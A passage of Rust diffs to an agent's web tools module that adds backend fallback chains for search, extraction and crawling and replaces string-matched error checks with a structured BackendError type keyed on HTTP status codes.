+/// Try each backend in `chain` in order; advance on transient errors, hard-fail on permanent ones.
+///
+/// Returns the results AND a reference to the backend that produced them so the caller
+/// can report `fallback_from` accurately.
+async fn search_with_fallback<'a>(
+    query: &str,
+    max: usize,
+    chain: &'a [SearchBackend],
+) -> Result<(Vec<SearchResult>, &'a SearchBackend), ToolError> {
+    let mut last_err: Option<BackendError> = None;
+    for backend in chain {
+        let res = match backend {
+            SearchBackend::Firecrawl => search_firecrawl(query, max).await,
+            SearchBackend::Tavily => search_tavily(query, max).await,
+            SearchBackend::Brave => search_brave(query, max).await,
+            SearchBackend::DuckDuckGo => search_duckduckgo(query, max).await,
+        };
+        match res {
+            Ok(results) if !results.is_empty() => return Ok((results, backend)),
+            Ok(_) => {
+                // Backend succeeded but returned nothing — try next.
+                last_err = Some(BackendError::hard("web_search", "No results returned."));
+            }
+            Err(e) if e.is_transient() => {
+                tracing::warn!(
+                    backend = search_backend_name(backend),
+                    error = %e,
+                    "web_search: backend unavailable, trying next in chain",
+                );
+                last_err = Some(e);
+            }
+            Err(e) => return Err(e.into_tool_error()),
+        }
+    }
+    Err(last_err
+        .map(BackendError::into_tool_error)
+        .unwrap_or_else(|| ToolError::ExecutionFailed {
+            tool: "web_search".into(),
+            message: "No search backends are available.".into(),
+        }))
+}
+
 #[async_trait]
 impl ToolHandler for WebSearchTool {
     fn name(&self) -> &'static str {
@@ -1554,30 +1631,32 @@ impl ToolHandler for WebSearchTool {
             })?;
 
         let max = args.max_results.unwrap_or(5).min(20);
+        let chain = resolve_search_backend_chain(args.backend.as_deref())?;
+        let (results, used_backend) = search_with_fallback(&args.query, max, &chain).await?;
 
-        let (backend_name, note, results) = match resolve_search_backend(args.backend.as_deref())? {
-            SearchBackend::Firecrawl => {
-                ("Firecrawl", None, search_firecrawl(&args.query, max).await?)
-            }
-            SearchBackend::Tavily => ("Tavily", None, search_tavily(&args.query, max).await?),
-            SearchBackend::Brave => ("Brave Search", None, search_brave(&args.query, max).await?),
-            SearchBackend::DuckDuckGo => {
-                let results = search_duckduckgo(&args.query, max).await?;
-                (
-                    "DuckDuckGo",
-                    Some(
-                        "DuckDuckGo HTML is the no-key fallback (Chrome TLS emulation). For reliable broad search set TAVILY_API_KEY or BRAVE_API_KEY in ~/.edgecrab/.env."
-                            .to_string(),
-                    ),
-                    results,
-                )
-            }
+        let used_name = search_backend_name(used_backend);
+        let primary_name = search_backend_name(&chain[0]);
+        let fallback_from: Option<&str> = if used_name != primary_name {
+            Some(primary_name)
+        } else {
+            None
+        };
+        let note: Option<String> = if matches!(used_backend, SearchBackend::DuckDuckGo) {
+            Some(
+                "DuckDuckGo HTML is the no-key fallback (Chrome TLS emulation). \
+                 For reliable broad search set TAVILY_API_KEY or BRAVE_API_KEY \
+                 in ~/.edgecrab/.env."
+                    .to_string(),
+            )
+        } else {
+            None
         };
 
         Ok(json!({
             "success": true,
             "query": args.query,
-            "backend": backend_name,
+            "backend": used_name,
+            "fallback_from": fallback_from,
             "note": note,
             "results": results,
         })

--- a/crates/edgecrab-tools/src/tools/web.rs
+++ b/crates/edgecrab-tools/src/tools/web.rs
@@ -451,32 +451,82 @@ fn content_backend_name(backend: ContentBackend) -> &'static str {
     }
 }
 
-/// Returns `true` when the error is transient — quota exhausted, rate-limited,
-/// temporarily unavailable, or a network-level failure — so the caller should
-/// try the next backend in the fallback chain.
+/// Structured error from a remote API backend.  The HTTP status code is
+/// captured at the call boundary so fallback decisions are made on facts,
+/// not fragile string-matching.
 ///
-/// Returns `false` for *content* errors (404 not found, invalid URL, parse
-/// failure, access denied) because switching backends won't fix them.
-fn is_backend_fallback_eligible(err: &ToolError) -> bool {
-    let msg = err.to_string().to_ascii_lowercase();
-    // HTTP status codes that indicate a backend quota / availability problem
-    msg.contains("http 402")
-        || msg.contains("http 429")
-        || msg.contains("http 503")
-        || msg.contains("http 502")
-        || msg.contains("http 500")
-        // Semantic phrases used by Firecrawl / Tavily error bodies
-        || msg.contains("payment required")
-        || msg.contains("quota")
-        || msg.contains("rate limit")
-        || msg.contains("too many requests")
-        || msg.contains("service unavailable")
-        // Network failures — server unreachable / DNS / timeout
-        || msg.contains("timed out")
-        || msg.contains("connection refused")
-        || msg.contains("failed to connect")
-        || msg.contains("dns error")
-        || msg.contains("name resolution")
+/// Construction helpers encode three distinct failure modes:
+/// - [`BackendError::api`]     — server responded with a non-2xx status
+/// - [`BackendError::network`] — request never completed (DNS/TCP/TLS)
+/// - [`BackendError::hard`]    — config, parse, or logic error that a
+///   backend switch cannot fix (missing API key, malformed response, …)
+#[derive(Debug)]
+struct BackendError {
+    /// HTTP status from the *backend API*.
+    /// `None`  = network-level failure (no response received at all).
+    /// `Some(0)` = hard non-HTTP error (parse failure, config error, …).
+    /// Any other value is the literal HTTP status code.
+    status: Option<u16>,
+    tool: String,
+    message: String,
+}
+
+impl BackendError {
+    /// The backend API responded with a non-2xx HTTP status `code`.
+    fn api(code: u16, tool: impl Into<String>, message: impl Into<String>) -> Self {
+        Self {
+            status: Some(code),
+            tool: tool.into(),
+            message: message.into(),
+        }
+    }
+
+    /// The HTTP request never completed (DNS, TCP, TLS, connection refused).
+    /// Always treated as transient — try the next backend.
+    fn network(tool: impl Into<String>, message: impl Into<String>) -> Self {
+        Self {
+            status: None,
+            tool: tool.into(),
+            message: message.into(),
+        }
+    }
+
+    /// A non-HTTP hard failure: missing API key, JSON parse error, unexpected
+    /// response shape.  A backend switch cannot fix these.
+    fn hard(tool: impl Into<String>, message: impl Into<String>) -> Self {
+        Self {
+            status: Some(0),
+            tool: tool.into(),
+            message: message.into(),
+        }
+    }
+
+    /// `true`  → the backend itself is temporarily unavailable (quota,
+    ///           rate-limit, 5xx server error, network failure).
+    ///           The fallback chain should try the next backend.
+    ///
+    /// `false` → the error is content-level or a hard config problem.
+    ///           Retrying with a different backend won't help.
+    fn is_transient(&self) -> bool {
+        match self.status {
+            None => true,                                    // network failure
+            Some(402 | 429 | 500 | 502 | 503 | 504) => true, // quota / server error
+            _ => false,                                      // 404, 403, parse error, hard(0), …
+        }
+    }
+
+    fn into_tool_error(self) -> ToolError {
+        ToolError::ExecutionFailed {
+            tool: self.tool,
+            message: self.message,
+        }
+    }
+}
+
+impl std::fmt::Display for BackendError {
+    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+        write!(f, "{}", self.message)
+    }
 }
 
 /// Returns an ordered list of backends to attempt for `web_extract` /
@@ -776,7 +826,8 @@ async fn search_tavily(query: &str, max: usize) -> Result<Vec<SearchResult>, Too
         }),
         "web_search",
     )
-    .await?;
+    .await
+    .map_err(BackendError::into_tool_error)?;
 
     let results = data["results"]
         .as_array()
@@ -812,17 +863,19 @@ fn firecrawl_metadata_text(metadata: &serde_json::Value, key: &str) -> Option<St
     }
 }
 
+/// Low-level Firecrawl HTTP helper.  Returns [`BackendError`] so that callers
+/// with a fallback chain can inspect `.is_transient()` without string-matching.
+/// Callers that do not need fallback semantics simply call
+/// `.map_err(BackendError::into_tool_error)?`.
 async fn firecrawl_request(
     method: reqwest::Method,
     path_or_url: &str,
     payload: Option<serde_json::Value>,
     tool: &str,
-) -> Result<serde_json::Value, ToolError> {
-    let api_key = std::env::var("FIRECRAWL_API_KEY").map_err(|_| ToolError::ExecutionFailed {
-        tool: tool.into(),
-        message: "Firecrawl backend requires FIRECRAWL_API_KEY.".into(),
-    })?;
-    let client = build_client()?;
+) -> Result<serde_json::Value, BackendError> {
+    let api_key = std::env::var("FIRECRAWL_API_KEY")
+        .map_err(|_| BackendError::hard(tool, "Firecrawl backend requires FIRECRAWL_API_KEY."))?;
+    let client = build_client().map_err(|e| BackendError::hard(tool, e.to_string()))?;
     let url = if path_or_url.starts_with("http://") || path_or_url.starts_with("https://") {
         path_or_url.to_string()
     } else {
@@ -839,24 +892,24 @@ async fn firecrawl_request(
         req = req.header("Content-Type", "application/json").json(&body);
     }
 
-    let resp = req.send().await.map_err(|e| ToolError::ExecutionFailed {
-        tool: tool.into(),
-        message: format!("Firecrawl API error: {e}"),
-    })?;
+    let resp = req
+        .send()
+        .await
+        .map_err(|e| BackendError::network(tool, format!("Firecrawl API error: {e}")))?;
 
     if !resp.status().is_success() {
-        let status = resp.status();
+        let code = resp.status().as_u16();
         let text = resp.text().await.unwrap_or_default();
-        return Err(ToolError::ExecutionFailed {
-            tool: tool.into(),
-            message: format!("Firecrawl API HTTP {status}: {text}"),
-        });
+        return Err(BackendError::api(
+            code,
+            tool,
+            format!("Firecrawl API HTTP {code}: {text}"),
+        ));
     }
 
-    resp.json().await.map_err(|e| ToolError::ExecutionFailed {
-        tool: tool.into(),
-        message: format!("Firecrawl JSON parse error: {e}"),
-    })
+    resp.json()
+        .await
+        .map_err(|e| BackendError::hard(tool, format!("Firecrawl JSON parse error: {e}")))
 }
 
 fn normalize_firecrawl_search_results(data: &serde_json::Value, max: usize) -> Vec<SearchResult> {
@@ -905,20 +958,23 @@ async fn search_firecrawl(query: &str, max: usize) -> Result<Vec<SearchResult>, 
         })),
         "web_search",
     )
-    .await?;
+    .await
+    .map_err(BackendError::into_tool_error)?;
     Ok(normalize_firecrawl_search_results(&data, max))
 }
 
+/// Low-level Tavily HTTP helper.  Returns [`BackendError`] for the same
+/// reason as [`firecrawl_request`]: callers in the fallback chain can inspect
+/// `.is_transient()` without string-matching; other callers convert with
+/// `.map_err(BackendError::into_tool_error)?`.
 async fn tavily_request(
     endpoint: &str,
     payload: serde_json::Value,
     tool: &str,
-) -> Result<serde_json::Value, ToolError> {
-    let api_key = std::env::var("TAVILY_API_KEY").map_err(|_| ToolError::ExecutionFailed {
-        tool: tool.into(),
-        message: "Tavily backend requires TAVILY_API_KEY.".into(),
-    })?;
-    let client = build_client()?;
+) -> Result<serde_json::Value, BackendError> {
+    let api_key = std::env::var("TAVILY_API_KEY")
+        .map_err(|_| BackendError::hard(tool, "Tavily backend requires TAVILY_API_KEY."))?;
+    let client = build_client().map_err(|e| BackendError::hard(tool, e.to_string()))?;
     let url = format!(
         "https://api.tavily.com/{}",
         endpoint.trim_start_matches('/')
@@ -928,12 +984,7 @@ async fn tavily_request(
             map.insert("api_key".into(), serde_json::Value::String(api_key));
             serde_json::Value::Object(map)
         }
-        _ => {
-            return Err(ToolError::ExecutionFailed {
-                tool: tool.into(),
-                message: "Invalid Tavily payload shape.".into(),
-            });
-        }
+        _ => return Err(BackendError::hard(tool, "Invalid Tavily payload shape.")),
     };
 
     let resp = client
@@ -942,24 +993,21 @@ async fn tavily_request(
         .json(&body)
         .send()
         .await
-        .map_err(|e| ToolError::ExecutionFailed {
-            tool: tool.into(),
-            message: format!("Tavily API error: {e}"),
-        })?;
+        .map_err(|e| BackendError::network(tool, format!("Tavily API error: {e}")))?;
 
     if !resp.status().is_success() {
-        let status = resp.status();
+        let code = resp.status().as_u16();
         let text = resp.text().await.unwrap_or_default();
-        return Err(ToolError::ExecutionFailed {
-            tool: tool.into(),
-            message: format!("Tavily API HTTP {status}: {text}"),
-        });
+        return Err(BackendError::api(
+            code,
+            tool,
+            format!("Tavily API HTTP {code}: {text}"),
+        ));
     }
 
-    resp.json().await.map_err(|e| ToolError::ExecutionFailed {
-        tool: tool.into(),
-        message: format!("Tavily JSON parse error: {e}"),
-    })
+    resp.json()
+        .await
+        .map_err(|e| BackendError::hard(tool, format!("Tavily JSON parse error: {e}")))
 }
 
 /// Search via Brave Search API (api_key from BRAVE_API_KEY env).
@@ -1211,10 +1259,12 @@ fn normalize_tavily_document(
     })
 }
 
+/// Extract a single URL via Firecrawl.  Returns [`BackendError`] so the
+/// fallback chain can call `.is_transient()` without string-matching.
 async fn extract_via_firecrawl(
     url: &str,
     max_chars: usize,
-) -> Result<ExtractedDocument, ToolError> {
+) -> Result<ExtractedDocument, BackendError> {
     let data = firecrawl_request(
         reqwest::Method::POST,
         "scrape",
@@ -1228,14 +1278,16 @@ async fn extract_via_firecrawl(
     .await?;
 
     normalize_firecrawl_document(&data["data"], max_chars, Some(url)).ok_or_else(|| {
-        ToolError::ExecutionFailed {
-            tool: "web_extract".into(),
-            message: "Firecrawl extraction returned no document.".into(),
-        }
+        BackendError::hard("web_extract", "Firecrawl extraction returned no document.")
     })
 }
 
-async fn extract_via_tavily(url: &str, max_chars: usize) -> Result<ExtractedDocument, ToolError> {
+/// Extract a single URL via Tavily.  Returns [`BackendError`] for the same
+/// reason as [`extract_via_firecrawl`].
+async fn extract_via_tavily(
+    url: &str,
+    max_chars: usize,
+) -> Result<ExtractedDocument, BackendError> {
     let data = tavily_request(
         "extract",
         json!({
@@ -1260,17 +1312,14 @@ async fn extract_via_tavily(url: &str, max_chars: usize) -> Result<ExtractedDocu
         .and_then(|value| value["error"].as_str())
         .unwrap_or("Tavily extraction returned no document.");
 
-    Err(ToolError::ExecutionFailed {
-        tool: "web_extract".into(),
-        message: failure.to_string(),
-    })
+    Err(BackendError::hard("web_extract", failure))
 }
 
 async fn collect_firecrawl_crawl_pages(
     mut response: serde_json::Value,
     max_chars: usize,
     instructions: Option<&str>,
-) -> Result<Vec<CrawledPage>, ToolError> {
+) -> Result<Vec<CrawledPage>, BackendError> {
     let mut pages = Vec::new();
     let mut seen = HashSet::new();
 
@@ -1328,7 +1377,7 @@ async fn crawl_via_firecrawl(
     max_depth: usize,
     max_chars: usize,
     same_path_only: bool,
-) -> Result<Vec<CrawledPage>, ToolError> {
+) -> Result<Vec<CrawledPage>, BackendError> {
     let mut payload = json!({
         "url": start_url.as_str(),
         "limit": max_pages,
@@ -1357,12 +1406,9 @@ async fn crawl_via_firecrawl(
 
     let started =
         firecrawl_request(reqwest::Method::POST, "crawl", Some(payload), "web_crawl").await?;
-    let job_id = started["id"]
-        .as_str()
-        .ok_or_else(|| ToolError::ExecutionFailed {
-            tool: "web_crawl".into(),
-            message: "Firecrawl crawl did not return a job id.".into(),
-        })?;
+    let job_id = started["id"].as_str().ok_or_else(|| {
+        BackendError::hard("web_crawl", "Firecrawl crawl did not return a job id.")
+    })?;
 
     let mut attempts = 0usize;
     loop {
@@ -1387,18 +1433,15 @@ async fn crawl_via_firecrawl(
                         })
                     })
                     .unwrap_or("Firecrawl crawl failed.");
-                return Err(ToolError::ExecutionFailed {
-                    tool: "web_crawl".into(),
-                    message: failure.to_string(),
-                });
+                return Err(BackendError::hard("web_crawl", failure.to_string()));
             }
             _ => {
                 attempts += 1;
                 if attempts >= 45 {
-                    return Err(ToolError::ExecutionFailed {
-                        tool: "web_crawl".into(),
-                        message: "Firecrawl crawl timed out waiting for completion.".into(),
-                    });
+                    return Err(BackendError::hard(
+                        "web_crawl",
+                        "Firecrawl crawl timed out waiting for completion.",
+                    ));
                 }
                 tokio::time::sleep(std::time::Duration::from_secs(1)).await;
             }
@@ -1411,7 +1454,7 @@ async fn crawl_via_tavily(
     instructions: Option<&str>,
     max_pages: usize,
     max_chars: usize,
-) -> Result<Vec<CrawledPage>, ToolError> {
+) -> Result<Vec<CrawledPage>, BackendError> {
     let mut payload = json!({
         "url": url,
         "limit": max_pages,
@@ -1569,8 +1612,16 @@ struct ExtractArgs {
 struct ExtractBatchEntry {
     url: String,
     success: bool,
+    #[serde(skip_serializing_if = "Option::is_none")]
     result: Option<ExtractedDocument>,
+    #[serde(skip_serializing_if = "Option::is_none")]
     error: Option<String>,
+    /// Backend that was used (or attempted first) for this URL.
+    backend: &'static str,
+    /// Set when fallback occurred: name of the originally requested backend
+    /// that failed before this entry’s actual backend was tried.
+    #[serde(skip_serializing_if = "Option::is_none")]
+    fallback_from: Option<&'static str>,
 }
 
 fn requested_extract_urls(args: &ExtractArgs) -> Result<Vec<String>, ToolError> {
@@ -1609,13 +1660,13 @@ fn parse_extract_url(requested: &str) -> Result<Url, ToolError> {
     })
 }
 
-/// Tries each backend in `chain` in order.  A transient / quota error
-/// (402 / 429 / 503 / network failure) causes the next backend to be
-/// attempted.  A content-level error (404, parse failure, bad URL) is
-/// returned immediately — retrying with a different backend won't help.
+/// Tries each backend in `chain` in order.  A transient failure
+/// (quota / rate-limit / server down / network — see [`BackendError::is_transient`])
+/// causes the next backend to be attempted.  A hard failure (404, parse error,
+/// invalid URL, missing API key) is returned immediately.
 ///
-/// Returns the extracted document **and** the backend that actually
-/// succeeded, so callers can report which path was taken.
+/// Returns the extracted document **and** the backend that actually succeeded
+/// so callers can surface which path was taken in the JSON response.
 async fn extract_with_fallback(
     url: &Url,
     chain: &[ContentBackend],
@@ -1624,15 +1675,12 @@ async fn extract_with_fallback(
     ctx: &ToolContext,
     tool: &str,
 ) -> Result<(ExtractedDocument, ContentBackend), ToolError> {
-    let mut last_err = ToolError::ExecutionFailed {
-        tool: tool.into(),
-        message: "No extraction backend is available.".into(),
-    };
+    let mut last_err = BackendError::hard(tool, "No extraction backend is available.");
 
     for &backend in chain {
         match extract_document_for_url(url, backend, max_chars, render_js_fallback, ctx).await {
             Ok(doc) => return Ok((doc, backend)),
-            Err(e) if is_backend_fallback_eligible(&e) => {
+            Err(e) if e.is_transient() => {
                 tracing::warn!(
                     backend = content_backend_name(backend),
                     url = url.as_str(),
@@ -1641,45 +1689,53 @@ async fn extract_with_fallback(
                 );
                 last_err = e;
             }
-            // Hard error (404, invalid URL, parse failure, …) — no retry.
-            Err(e) => return Err(e),
+            // Hard error (404, parse failure, missing API key, …): propagate immediately.
+            Err(e) => return Err(e.into_tool_error()),
         }
     }
 
-    Err(last_err)
+    Err(last_err.into_tool_error())
 }
 
+/// Dispatch a single URL to the specified backend.  Returns [`BackendError`]
+/// so [`extract_with_fallback`] can inspect `.is_transient()` without any
+/// string-matching.  Callers outside the fallback chain convert with
+/// `.map_err(BackendError::into_tool_error)`.
 async fn extract_document_for_url(
     requested_url: &Url,
     backend: ContentBackend,
     max_chars: usize,
     render_js_fallback: bool,
     ctx: &ToolContext,
-) -> Result<ExtractedDocument, ToolError> {
+) -> Result<ExtractedDocument, BackendError> {
     match backend {
+        // Paid API backends — propagate BackendError directly; is_transient()
+        // reflects the actual HTTP status code from the API.
         ContentBackend::Firecrawl => extract_via_firecrawl(requested_url.as_str(), max_chars).await,
         ContentBackend::Tavily => extract_via_tavily(requested_url.as_str(), max_chars).await,
+
+        // Browser / Native: infrastructure errors are classified Hard because
+        // they reflect target-URL content failures, not backend availability.
         ContentBackend::Browser => {
             fetch_browser_document(requested_url, "text/html", max_chars, ctx, "web_extract")
                 .await
                 .map(|page| page.document)
+                .map_err(|e| BackendError::hard("web_extract", e.to_string()))
         }
         ContentBackend::Native => {
-            let client = build_chrome_client("web_extract")?;
+            let client = build_chrome_client("web_extract")
+                .map_err(|e| BackendError::hard("web_extract", e.to_string()))?;
             let resp = client
                 .get(requested_url.as_str())
                 .send()
                 .await
-                .map_err(|e| ToolError::ExecutionFailed {
-                    tool: "web_extract".into(),
-                    message: format!("HTTP error: {e}"),
-                })?;
+                .map_err(|e| BackendError::hard("web_extract", format!("HTTP error: {e}")))?;
 
             if !resp.status().is_success() {
-                return Err(ToolError::ExecutionFailed {
-                    tool: "web_extract".into(),
-                    message: format!("HTTP {}: {}", resp.status(), requested_url),
-                });
+                return Err(BackendError::hard(
+                    "web_extract",
+                    format!("HTTP {}: {}", resp.status(), requested_url),
+                ));
             }
 
             let final_url = resp.url().clone();
@@ -1689,10 +1745,10 @@ async fn extract_document_for_url(
                 .and_then(|value| value.to_str().ok())
                 .unwrap_or("")
                 .to_string();
-            let body = resp.bytes().await.map_err(|e| ToolError::ExecutionFailed {
-                tool: "web_extract".into(),
-                message: format!("Body read error: {e}"),
-            })?;
+            let body = resp
+                .bytes()
+                .await
+                .map_err(|e| BackendError::hard("web_extract", format!("Body read error: {e}")))?;
 
             fetch_native_document(
                 &final_url,
@@ -1705,6 +1761,7 @@ async fn extract_document_for_url(
             )
             .await
             .map(|page| page.document)
+            .map_err(|e| BackendError::hard("web_extract", e.to_string()))
         }
     }
 }
@@ -1847,6 +1904,10 @@ impl ToolHandler for WebExtractTool {
         }
 
         let mut results = Vec::with_capacity(requested_urls.len());
+        // The "primary" backend is the first in the chain (what the user asked
+        // for, or the highest-priority auto choice).  Each URL reports which
+        // backend was actually used so the agent always knows the fallback path.
+        let primary_backend_name = content_backend_name(chain[0]);
         for requested in requested_urls {
             let entry = match parse_extract_url(&requested) {
                 Ok(parsed) => match extract_with_fallback(
@@ -1859,17 +1920,28 @@ impl ToolHandler for WebExtractTool {
                 )
                 .await
                 {
-                    Ok((document, _used)) => ExtractBatchEntry {
-                        url: requested,
-                        success: true,
-                        result: Some(document),
-                        error: None,
-                    },
+                    Ok((document, used_backend)) => {
+                        let used_name = content_backend_name(used_backend);
+                        ExtractBatchEntry {
+                            url: requested,
+                            success: true,
+                            result: Some(document),
+                            error: None,
+                            backend: used_name,
+                            fallback_from: if used_name != primary_backend_name {
+                                Some(primary_backend_name)
+                            } else {
+                                None
+                            },
+                        }
+                    }
                     Err(error) => ExtractBatchEntry {
                         url: requested,
                         success: false,
                         result: None,
                         error: Some(error.to_string()),
+                        backend: primary_backend_name,
+                        fallback_from: None,
                     },
                 },
                 Err(error) => ExtractBatchEntry {
@@ -1877,6 +1949,8 @@ impl ToolHandler for WebExtractTool {
                     success: false,
                     result: None,
                     error: Some(error.to_string()),
+                    backend: primary_backend_name,
+                    fallback_from: None,
                 },
             };
             results.push(entry);
@@ -2045,7 +2119,7 @@ impl ToolHandler for WebCrawlTool {
                     })
                     .to_string());
                 }
-                Err(e) if is_backend_fallback_eligible(&e) => {
+                Err(e) if e.is_transient() => {
                     tracing::warn!(
                         backend = content_backend_name(backend),
                         url = args.url,
@@ -2054,7 +2128,7 @@ impl ToolHandler for WebCrawlTool {
                     );
                     // Continue to the next backend in the chain.
                 }
-                Err(e) => return Err(e), // hard error (bad URL, etc.)
+                Err(e) => return Err(e.into_tool_error()), // hard error (bad URL, etc.)
             }
         }
 

--- a/crates/edgecrab-tools/src/tools/web.rs
+++ b/crates/edgecrab-tools/src/tools/web.rs
@@ -451,6 +451,78 @@ fn content_backend_name(backend: ContentBackend) -> &'static str {
     }
 }
 
+/// Returns `true` when the error is transient — quota exhausted, rate-limited,
+/// temporarily unavailable, or a network-level failure — so the caller should
+/// try the next backend in the fallback chain.
+///
+/// Returns `false` for *content* errors (404 not found, invalid URL, parse
+/// failure, access denied) because switching backends won't fix them.
+fn is_backend_fallback_eligible(err: &ToolError) -> bool {
+    let msg = err.to_string().to_ascii_lowercase();
+    // HTTP status codes that indicate a backend quota / availability problem
+    msg.contains("http 402")
+        || msg.contains("http 429")
+        || msg.contains("http 503")
+        || msg.contains("http 502")
+        || msg.contains("http 500")
+        // Semantic phrases used by Firecrawl / Tavily error bodies
+        || msg.contains("payment required")
+        || msg.contains("quota")
+        || msg.contains("rate limit")
+        || msg.contains("too many requests")
+        || msg.contains("service unavailable")
+        // Network failures — server unreachable / DNS / timeout
+        || msg.contains("timed out")
+        || msg.contains("connection refused")
+        || msg.contains("failed to connect")
+        || msg.contains("dns error")
+        || msg.contains("name resolution")
+}
+
+/// Returns an ordered list of backends to attempt for `web_extract` /
+/// `web_crawl`.  "auto" mode builds the full chain so that if a paid API
+/// fails transiently (402 / 429 / 503) the tool automatically retries with
+/// the next available backend.  Explicit overrides return a single-element
+/// slice; the user asked for a specific backend and we honour that intent
+/// rather than silently falling through to a different one.
+fn resolve_extract_backend_chain(
+    preferred: Option<&str>,
+    tool: &str,
+) -> Result<Vec<ContentBackend>, ToolError> {
+    let choice = preferred
+        .map(|value| value.trim().to_ascii_lowercase())
+        .filter(|value| !value.is_empty())
+        .or_else(|| {
+            backend_override(&[
+                if tool == "web_crawl" {
+                    "EDGECRAB_WEB_CRAWL_BACKEND"
+                } else {
+                    "EDGECRAB_WEB_EXTRACT_BACKEND"
+                },
+                "EDGECRAB_WEB_BACKEND",
+            ])
+        });
+
+    match choice.as_deref().unwrap_or("auto") {
+        "auto" => {
+            // Build a priority chain: paid APIs first (better quality), then
+            // the always-available native Chrome-emulating client as the
+            // guaranteed last resort.
+            let mut chain = Vec::with_capacity(3);
+            if has_firecrawl_api_key() {
+                chain.push(ContentBackend::Firecrawl);
+            }
+            if has_tavily_api_key() {
+                chain.push(ContentBackend::Tavily);
+            }
+            chain.push(ContentBackend::Native); // always available
+            Ok(chain)
+        }
+        // Explicit overrides: single-element chain — fallback not applied.
+        other => resolve_content_backend(Some(other), tool).map(|b| vec![b]),
+    }
+}
+
 fn infer_title_from_url(url: &Url, fallback: &str) -> String {
     url.path_segments()
         .and_then(|mut segments| segments.next_back())
@@ -1537,6 +1609,46 @@ fn parse_extract_url(requested: &str) -> Result<Url, ToolError> {
     })
 }
 
+/// Tries each backend in `chain` in order.  A transient / quota error
+/// (402 / 429 / 503 / network failure) causes the next backend to be
+/// attempted.  A content-level error (404, parse failure, bad URL) is
+/// returned immediately — retrying with a different backend won't help.
+///
+/// Returns the extracted document **and** the backend that actually
+/// succeeded, so callers can report which path was taken.
+async fn extract_with_fallback(
+    url: &Url,
+    chain: &[ContentBackend],
+    max_chars: usize,
+    render_js_fallback: bool,
+    ctx: &ToolContext,
+    tool: &str,
+) -> Result<(ExtractedDocument, ContentBackend), ToolError> {
+    let mut last_err = ToolError::ExecutionFailed {
+        tool: tool.into(),
+        message: "No extraction backend is available.".into(),
+    };
+
+    for &backend in chain {
+        match extract_document_for_url(url, backend, max_chars, render_js_fallback, ctx).await {
+            Ok(doc) => return Ok((doc, backend)),
+            Err(e) if is_backend_fallback_eligible(&e) => {
+                tracing::warn!(
+                    backend = content_backend_name(backend),
+                    url = url.as_str(),
+                    error = %e,
+                    "Backend unavailable — trying next in chain"
+                );
+                last_err = e;
+            }
+            // Hard error (404, invalid URL, parse failure, …) — no retry.
+            Err(e) => return Err(e),
+        }
+    }
+
+    Err(last_err)
+}
+
 async fn extract_document_for_url(
     requested_url: &Url,
     backend: ContentBackend,
@@ -1696,21 +1808,38 @@ impl ToolHandler for WebExtractTool {
 
         let requested_urls = requested_extract_urls(&args)?;
         let max_chars = args.max_chars.unwrap_or(8_000).min(50_000);
-        let backend = resolve_content_backend(args.backend.as_deref(), "web_extract")?;
+        // Use a fallback chain: in "auto" mode the tool tries Firecrawl first,
+        // then Tavily, then Native.  If a paid API returns 402 / 429 / 503 the
+        // next backend is attempted automatically.  Explicit backend overrides
+        // still resolve to a single-element chain (no silent fallback).
+        let chain = resolve_extract_backend_chain(args.backend.as_deref(), "web_extract")?;
         let render_js_fallback = args.render_js_fallback.unwrap_or(true);
-        let backend_name = content_backend_name(backend);
         let batch_mode = requested_urls.len() > 1 || args.urls.is_some();
 
         if !batch_mode {
             let only_url = &requested_urls[0];
             let parsed = parse_extract_url(only_url)?;
-            let document =
-                extract_document_for_url(&parsed, backend, max_chars, render_js_fallback, ctx)
-                    .await?;
+            let (document, used_backend) = extract_with_fallback(
+                &parsed,
+                &chain,
+                max_chars,
+                render_js_fallback,
+                ctx,
+                "web_extract",
+            )
+            .await?;
+            let used_name = content_backend_name(used_backend);
+            let requested_name = content_backend_name(chain[0]);
+            let fallback_from: Option<&str> = if used_name != requested_name {
+                Some(requested_name)
+            } else {
+                None
+            };
 
             return Ok(json!({
                 "success": true,
-                "backend": backend_name,
+                "backend": used_name,
+                "fallback_from": fallback_from,
                 "result": document.clone(),
                 "results": [document],
             })
@@ -1720,16 +1849,17 @@ impl ToolHandler for WebExtractTool {
         let mut results = Vec::with_capacity(requested_urls.len());
         for requested in requested_urls {
             let entry = match parse_extract_url(&requested) {
-                Ok(parsed) => match extract_document_for_url(
+                Ok(parsed) => match extract_with_fallback(
                     &parsed,
-                    backend,
+                    &chain,
                     max_chars,
                     render_js_fallback,
                     ctx,
+                    "web_extract",
                 )
                 .await
                 {
-                    Ok(document) => ExtractBatchEntry {
+                    Ok((document, _used)) => ExtractBatchEntry {
                         url: requested,
                         success: true,
                         result: Some(document),
@@ -1753,9 +1883,10 @@ impl ToolHandler for WebExtractTool {
         }
 
         let success_count = results.iter().filter(|entry| entry.success).count();
+        let batch_backend_name = content_backend_name(chain[0]);
         Ok(json!({
             "success": success_count > 0,
-            "backend": backend_name,
+            "backend": batch_backend_name,
             "results": results,
         })
         .to_string())
@@ -1842,9 +1973,11 @@ impl ToolHandler for WebCrawlTool {
         let max_depth = args.max_depth.unwrap_or(2).min(4);
         let max_chars_per_page = args.max_chars_per_page.unwrap_or(4_000).clamp(500, 12_000);
         let same_path_only = args.same_path_only.unwrap_or(false);
-        let backend = resolve_content_backend(args.backend.as_deref(), "web_crawl")?;
+        // Fallback chain: in "auto" mode try Firecrawl first, then Tavily, then
+        // Native BFS.  Transient failures (402 / 429 / 503) fall through to the
+        // next backend automatically.
+        let chain = resolve_extract_backend_chain(args.backend.as_deref(), "web_crawl")?;
         let render_js_fallback = args.render_js_fallback.unwrap_or(true);
-        let backend_name = content_backend_name(backend);
 
         validate_url(&args.url, "web_crawl")?;
         let start_url = Url::parse(&args.url).map_err(|e| ToolError::InvalidArgs {
@@ -1852,8 +1985,14 @@ impl ToolHandler for WebCrawlTool {
             message: format!("Invalid URL: {e}"),
         })?;
 
-        if matches!(backend, ContentBackend::Firecrawl | ContentBackend::Tavily) {
-            let mut pages = match backend {
+        // ── Phase 1: try the paid-API crawl backends (Firecrawl / Tavily) ──
+        for &backend in &chain {
+            if !matches!(backend, ContentBackend::Firecrawl | ContentBackend::Tavily) {
+                // Reached Native / Browser — handled by BFS below.
+                break;
+            }
+
+            let result = match backend {
                 ContentBackend::Firecrawl => {
                     crawl_via_firecrawl(
                         &start_url,
@@ -1863,7 +2002,7 @@ impl ToolHandler for WebCrawlTool {
                         max_chars_per_page,
                         same_path_only,
                     )
-                    .await?
+                    .await
                 }
                 ContentBackend::Tavily => {
                     crawl_via_tavily(
